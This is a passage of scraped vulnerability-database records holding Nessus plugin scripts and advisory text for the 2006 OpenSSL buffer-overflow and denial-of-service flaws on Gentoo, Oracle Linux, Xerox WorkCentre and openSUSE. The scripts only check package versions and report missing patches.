extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:15:01", "description": "The remote host is affected by the vulnerability described in GLSA-200610-11 (OpenSSL: Multiple vulnerabilities)\n\n Tavis Ormandy and Will Drewry, both of the Google Security Team, discovered that the SSL_get_shared_ciphers() function contains a buffer overflow vulnerability, and that the SSLv2 client code contains a flaw leading to a crash. Additionally Dr. Stephen N. Henson found that the ASN.1 handler contains two Denial of Service vulnerabilities: while parsing an invalid ASN.1 structure and while handling certain types of public key.\n Impact :\n\n An attacker could trigger the buffer overflow vulnerability by sending a malicious suite of ciphers to an application using the vulnerable function, and thus execute arbitrary code with the rights of the user running the application. An attacker could also consume CPU and/or memory by exploiting the Denial of Service vulnerabilities. Finally a malicious server could crash a SSLv2 client through the SSLv2 vulnerability.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": null, "vector": null}, "published": "2006-10-25T00:00:00", "type": "nessus", "title": "GLSA-200610-11 : OpenSSL: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:openssl", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200610-11.NASL", "href": "https://www.tenable.com/plugins/nessus/22914", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200610-11.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22914);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\");\n script_xref(name:\"GLSA\", value:\"200610-11\");\n\n script_name(english:\"GLSA-200610-11 : OpenSSL: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200610-11\n(OpenSSL: Multiple vulnerabilities)\n\n Tavis Ormandy and Will Drewry, both of the Google Security Team,\n discovered that the SSL_get_shared_ciphers() function contains a buffer\n overflow vulnerability, and that the SSLv2 client code contains a flaw\n leading to a crash. Additionally Dr. Stephen N. Henson found that the\n ASN.1 handler contains two Denial of Service vulnerabilities: while\n parsing an invalid ASN.1 structure and while handling certain types of\n public key.\n \nImpact :\n\n An attacker could trigger the buffer overflow vulnerability by sending\n a malicious suite of ciphers to an application using the vulnerable\n function, and thus execute arbitrary code with the rights of the user\n running the application. An attacker could also consume CPU and/or\n memory by exploiting the Denial of Service vulnerabilities. Finally a\n malicious server could crash a SSLv2 client through the SSLv2\n vulnerability.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200610-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All OpenSSL 0.9.8 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-libs/openssl-0.9.8d'\n All OpenSSL 0.9.7 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-libs/openssl-0.9.7l'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/25\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-libs/openssl\", unaffected:make_list(\"ge 0.9.8d\", \"rge 0.9.7l\"), vulnerable:make_list(\"lt 0.9.8d\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"OpenSSL\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:54:17", "description": "From Red Hat Security Advisory 2006:0695 :\n\nUpdated OpenSSL packages are now available to correct several security issues.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nThe OpenSSL toolkit provides support for secure communications between machines. OpenSSL includes a certificate management tool and shared libraries which provide various cryptographic algorithms and protocols.\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a buffer overflow in the SSL_get_shared_ciphers() utility function. An attacker could send a list of ciphers to an application that used this function and overrun a buffer (CVE-2006-3738). Few applications make use of this vulnerable function and generally it is used only when applications are compiled for debugging.\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a flaw in the SSLv2 client code. When a client application used OpenSSL to create an SSLv2 connection to a malicious server, that server could cause the client to crash. (CVE-2006-4343)\n\nDr S. N. Henson of the OpenSSL core team and Open Network Security recently developed an ASN.1 test suite for NISCC (www.niscc.gov.uk) which uncovered denial of service vulnerabilities :\n\n* Certain public key types can take disproportionate amounts of time to process, leading to a denial of service. (CVE-2006-2940)\n\n* During parsing of certain invalid ASN.1 structures an error condition was mishandled. This can result in an infinite loop which consumed system memory (CVE-2006-2937). This issue does not affect the OpenSSL version distributed in Red Hat Enterprise Linux 2.1.\n\nThese vulnerabilities can affect applications which use OpenSSL to parse ASN.1 data from untrusted sources, including SSL servers which enable client authentication and S/MIME applications.\n\nUsers are advised to upgrade to these updated packages, which contain backported patches to correct these issues.\n\nNote: After installing this update, users are advised to either restart all services that use OpenSSL or restart their system.", "cvss3": {"score": null, "vector": null}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 3 : openssl (ELSA-2006-0695)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:openssl", "p-cpe:/a:oracle:linux:openssl-devel", "p-cpe:/a:oracle:linux:openssl-perl", "p-cpe:/a:oracle:linux:openssl096b", "cpe:/o:oracle:linux:3"], "id": "ORACLELINUX_ELSA-2006-0695.NASL", "href": "https://www.tenable.com/plugins/nessus/67411", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2006:0695 and \n# Oracle Linux Security Advisory ELSA-2006-0695 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67411);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\");\n script_xref(name:\"RHSA\", value:\"2006:0695\");\n\n script_name(english:\"Oracle Linux 3 : openssl (ELSA-2006-0695)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2006:0695 :\n\nUpdated OpenSSL packages are now available to correct several security\nissues.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe OpenSSL toolkit provides support for secure communications between\nmachines. OpenSSL includes a certificate management tool and shared\nlibraries which provide various cryptographic algorithms and\nprotocols.\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a\nbuffer overflow in the SSL_get_shared_ciphers() utility function. An\nattacker could send a list of ciphers to an application that used this\nfunction and overrun a buffer (CVE-2006-3738). Few applications make\nuse of this vulnerable function and generally it is used only when\napplications are compiled for debugging.\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a\nflaw in the SSLv2 client code. When a client application used OpenSSL\nto create an SSLv2 connection to a malicious server, that server could\ncause the client to crash. (CVE-2006-4343)\n\nDr S. N. Henson of the OpenSSL core team and Open Network Security\nrecently developed an ASN.1 test suite for NISCC (www.niscc.gov.uk)\nwhich uncovered denial of service vulnerabilities :\n\n* Certain public key types can take disproportionate amounts of time\nto process, leading to a denial of service. (CVE-2006-2940)\n\n* During parsing of certain invalid ASN.1 structures an error\ncondition was mishandled. This can result in an infinite loop which\nconsumed system memory (CVE-2006-2937). This issue does not affect the\nOpenSSL version distributed in Red Hat Enterprise Linux 2.1.\n\nThese vulnerabilities can affect applications which use OpenSSL to\nparse ASN.1 data from untrusted sources, including SSL servers which\nenable client authentication and S/MIME applications.\n\nUsers are advised to upgrade to these updated packages, which contain\nbackported patches to correct these issues.\n\nNote: After installing this update, users are advised to either\nrestart all services that use OpenSSL or restart their system.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-March/000085.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl096b\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"openssl-0.9.7a-33.21\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"openssl-0.9.7a-33.21\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"openssl-devel-0.9.7a-33.21\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"openssl-devel-0.9.7a-33.21\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"openssl-perl-0.9.7a-33.21\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"openssl-perl-0.9.7a-33.21\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"openssl096b-0.9.6b-16.46\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"openssl096b-0.9.6b-16.46\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-devel / openssl-perl / openssl096b\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:14:35", "description": "The remote host is affected by the vulnerability described in GLSA-200612-11 (AMD64 x86 emulation base libraries: OpenSSL multiple vulnerabilities)\n\n Tavis Ormandy and Will Drewry, both of the Google Security Team, discovered that the SSL_get_shared_ciphers() function contains a buffer overflow vulnerability, and that the SSLv2 client code contains a flaw leading to a crash. Additionally, Dr. Stephen N. Henson found that the ASN.1 handler contains two Denial of Service vulnerabilities: while parsing an invalid ASN.1 structure and while handling certain types of public key.\n Impact :\n\n An attacker could trigger the buffer overflow by sending a malicious suite of ciphers to an application using the vulnerable function, and thus execute arbitrary code with the rights of the user running the application. An attacker could also consume CPU and/or memory by exploiting the Denial of Service vulnerabilities. Finally, a malicious server could crash a SSLv2 client through the SSLv2 vulnerability.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": null, "vector": null}, "published": "2006-12-14T00:00:00", "type": "nessus", "title": "GLSA-200612-11 : AMD64 x86 emulation base libraries: OpenSSL multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:emul-linux-x86-baselibs", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200612-11.NASL", "href": "https://www.tenable.com/plugins/nessus/23863", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200612-11.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(23863);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\");\n script_bugtraq_id(20246, 20247, 20248, 20249);\n script_xref(name:\"GLSA\", value:\"200612-11\");\n\n script_name(english:\"GLSA-200612-11 : AMD64 x86 emulation base libraries: OpenSSL multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200612-11\n(AMD64 x86 emulation base libraries: OpenSSL multiple vulnerabilities)\n\n Tavis Ormandy and Will Drewry, both of the Google Security Team,\n discovered that the SSL_get_shared_ciphers() function contains a buffer\n overflow vulnerability, and that the SSLv2 client code contains a flaw\n leading to a crash. Additionally, Dr. Stephen N. Henson found that the\n ASN.1 handler contains two Denial of Service vulnerabilities: while\n parsing an invalid ASN.1 structure and while handling certain types of\n public key.\n \nImpact :\n\n An attacker could trigger the buffer overflow by sending a malicious\n suite of ciphers to an application using the vulnerable function, and\n thus execute arbitrary code with the rights of the user running the\n application. An attacker could also consume CPU and/or memory by\n exploiting the Denial of Service vulnerabilities. Finally, a malicious\n server could crash a SSLv2 client through the SSLv2 vulnerability.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200612-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All AMD64 x86 emulation base libraries users should upgrade to the\n latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-emulation/emul-linux-x86-baselibs-2.5.5'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:emul-linux-x86-baselibs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\", \"Host/Gentoo/arch\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\nourarch = get_kb_item(\"Host/Gentoo/arch\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(amd64)$\") audit(AUDIT_ARCH_NOT, \"amd64\", ourarch);\n\nflag = 0;\n\nif (qpkg_check(package:\"app-emulation/emul-linux-x86-baselibs\", arch:\"amd64\", unaffected:make_list(\"ge 2.5.5\"), vulnerable:make_list(\"lt 2.5.5\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"AMD64 x86 emulation base libraries\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-16T16:05:25", "description": "According to its model number and software version, the remote host is a Xerox WorkCentre device that reportedly suffers from multiple issues in the ESS / Network Controller that could allow remote execution of arbitrary code on the affected device, initiation of denial of service attacks, and forgery of digital certificates.", "cvss3": {"score": null, "vector": null}, "published": "2007-07-01T00:00:00", "type": "nessus", "title": "Xerox WorkCentre Multiple OpenSSL Vulnerabilities (XRX07-001)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/h:xerox:workcentre"], "id": "XEROX_XRX07_001.NASL", "href": "https://www.tenable.com/plugins/nessus/25637", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25637);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\n \"CVE-2006-2937\",\n \"CVE-2006-2940\",\n \"CVE-2006-3738\",\n \"CVE-2006-4343\"\n );\n script_bugtraq_id(20246, 20247, 20248, 20249);\n\n script_name(english:\"Xerox WorkCentre Multiple OpenSSL Vulnerabilities (XRX07-001)\");\n script_summary(english:\"Checks Net Controller Software version of Xerox WorkCentre devices\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote multi-function device is affected by multiple issues.\");\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its model number and software version, the remote host\nis a Xerox WorkCentre device that reportedly suffers from multiple\nissues in the ESS / Network Controller that could allow remote\nexecution of arbitrary code on the affected device, initiation of\ndenial of service attacks, and forgery of digital certificates.\"\n );\n # https://www.xerox.com/downloads/usa/en/c/cert_ESSNetwork_XRX07001_v1.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?25874e73\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Apply the P30 patch as described in the Xerox security bulletin\nreferenced above.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/07/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:xerox:workcentre\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"xerox_workcentre_detect.nasl\");\n script_require_keys(\"www/xerox_workcentre\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# This function returns TRUE if the version string ver lies in\n# the range [low, high].\nfunction ver_inrange(ver, low, high)\n{\n local_var ver_parts, low_parts, high_parts, i, p, low_p, high_p;\n\n if (isnull(ver) || isnull(low) || isnull(high)) return FALSE;\n\n # Split levels into parts.\n ver_parts = split(ver, sep:\".\", keep:0);\n low_parts = split(low, sep:\".\", keep:0);\n high_parts = split(high, sep:\".\", keep:0);\n\n # Compare each part.\n i = 0;\n while (ver_parts[i] != NULL)\n {\n p = int(ver_parts[i]);\n low_p = int(low_parts[i]);\n if (low_p == NULL) low_p = 0;\n high_p = int(high_parts[i]);\n if (high_p == NULL) high_p = 0;\n\n if (p > low_p && p < high_p) return TRUE;\n if (p < low_p || p > high_p) return FALSE;\n ++i;\n }\n return TRUE;\n}\n\n\n# Check whether the device is vulnerable.\nif (get_kb_item(\"www/xerox_workcentre\"))\n{\n model = get_kb_item_or_exit(\"www/xerox_workcentre/model\");\n ess = get_kb_item_or_exit(\"www/xerox_workcentre/ess\");\n\n # No need to check further if ESS has \".P30\" since that\n # indicates the patch has already been applied.\n if (ess && ess =~ \"\\.P30\") audit(AUDIT_HOST_NOT, \"affected\");\n\n # Test model number and software version against those in Xerox's security bulletin.\n if (\n (\n # nb: models 232/238/245/255/265/275 with ESS in [0, 040.022.00115).\n (model =~ \"^2(3[28]|[4-7]5)\" || model =~ \"Pro 2(3[28]|[4-7]5)\") &&\n ver_inrange(ver:ess, low:\"0.0.0\", high:\"040.022.1031\")\n ) ||\n (\n # nb: models 7655/7665 with ESS in [0, 040.032.53080].\n (model =~ \"^76[56]5\") &&\n ver_inrange(ver:ess, low:\"0.0.0\", high:\"040.032.53081\")\n )\n )\n security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T13:13:18", "description": "A buffer overflow condition within the SSL_get_shared_ciphers() function and a DoS condition known as 'parasitic public keys' have been fixed. The later problem allowed attackers to trick the OpenSSL engine to spend an extraordinary amount of time to process public keys. The following CAN numbers have been assigned: CVE-2006-2937, CVE-2006-2940, CVE-2006-3738, CVE-2006-4339 and CVE-2006-4343.", "cvss3": {"score": null, "vector": null}, "published": "2007-10-17T00:00:00", "type": "nessus", "title": "openSUSE 10 Security Update : compat-openssl097g (compat-openssl097g-2171)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4339", "CVE-2006-4343"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:compat-openssl097g", "p-cpe:/a:novell:opensuse:compat-openssl097g-32bit", "cpe:/o:novell:opensuse:10.1"], "id": "SUSE_COMPAT-OPENSSL097G-2171.NASL", "href": "https://www.tenable.com/plugins/nessus/27187", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update compat-openssl097g-2171.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27187);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4339\", \"CVE-2006-4343\");\n\n script_name(english:\"openSUSE 10 Security Update : compat-openssl097g (compat-openssl097g-2171)\");\n script_summary(english:\"Check for the compat-openssl097g-2171 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow condition within the SSL_get_shared_ciphers()\nfunction and a DoS condition known as 'parasitic public keys' have\nbeen fixed. The later problem allowed attackers to trick the OpenSSL\nengine to spend an extraordinary amount of time to process public\nkeys. The following CAN numbers have been assigned: CVE-2006-2937,\nCVE-2006-2940, CVE-2006-3738, CVE-2006-4339 and CVE-2006-4343.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected compat-openssl097g packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:compat-openssl097g\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:compat-openssl097g-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", 